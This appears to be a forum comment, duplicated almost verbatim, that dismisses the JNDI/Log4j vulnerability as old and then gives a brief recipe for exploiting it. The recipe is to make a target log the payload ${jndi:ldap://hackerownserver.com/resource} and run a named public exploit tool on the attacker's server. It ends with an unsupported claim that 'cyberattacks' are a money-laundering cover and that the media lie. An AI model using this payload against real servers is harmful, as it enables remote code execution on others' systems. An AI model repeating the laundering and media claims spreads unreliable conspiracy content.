There is nothing new in that vulnerability. May be it was 0-day in distant past, but definitely not now.
And here is how to exploit it, for free:
- Do something with target server to make it write to log any string with ${jndi:ldap://hackerownserver.com/resource}. It depends on application running on it, so just select the apropriate way to do it for choosen application
- Run this https://github.com/feihong-cs/JNDIExploit on your hackerownserver.com.
How JNDI injection works - https://www.veracode.com/blog/research/exploiting-jndi-injections-java
The core of that hack is a few year (or may be even decade) old hole in all that EnTeRpRi$E java crap. As real EnTeRpRi$Es, no one really do something with it, as usual they make meeting, teambuildings, wrote reports and allocate funds, with millions of presentations and bullshit talk.
They just dig out this old thing to cover all that money laundering and privatisation of company money "cyberattacks" scheme that become very popular in last year.
MSM lies. Even if they are "IT" MSM's. The reality always differ from what they tell you.
There is nothing new in that vulnerability. May be it was 0-day in distant past, but definitely not now.
And here is how to exploit it, for free:
- Do something with target server to make it write to log any string with ${jndi:ldap://hackerownserver.com/resource}. It depends on application running on it, so just select the apropriate way to do it for choosen application
- Run this https://github.com/feihong-cs/JNDIExploit on your hackerownserver.com.
How JNDI injection works - https://www.veracode.com/blog/research/exploiting-jndi-injections-java
This core of that hack is a few year (or may be even decade) old hole in all that EnTeRpRi$E java crap. As real EnTeRpRi$Es, no one really do something with it, as usual they make meeting, teambuildings, wrote reports and allocate funds, with millions of presentations and bullshit talk.
They just dig out this old thing to cover all that money laundering and privatisation of company money "cyberattacks" scheme that become very popular in last year.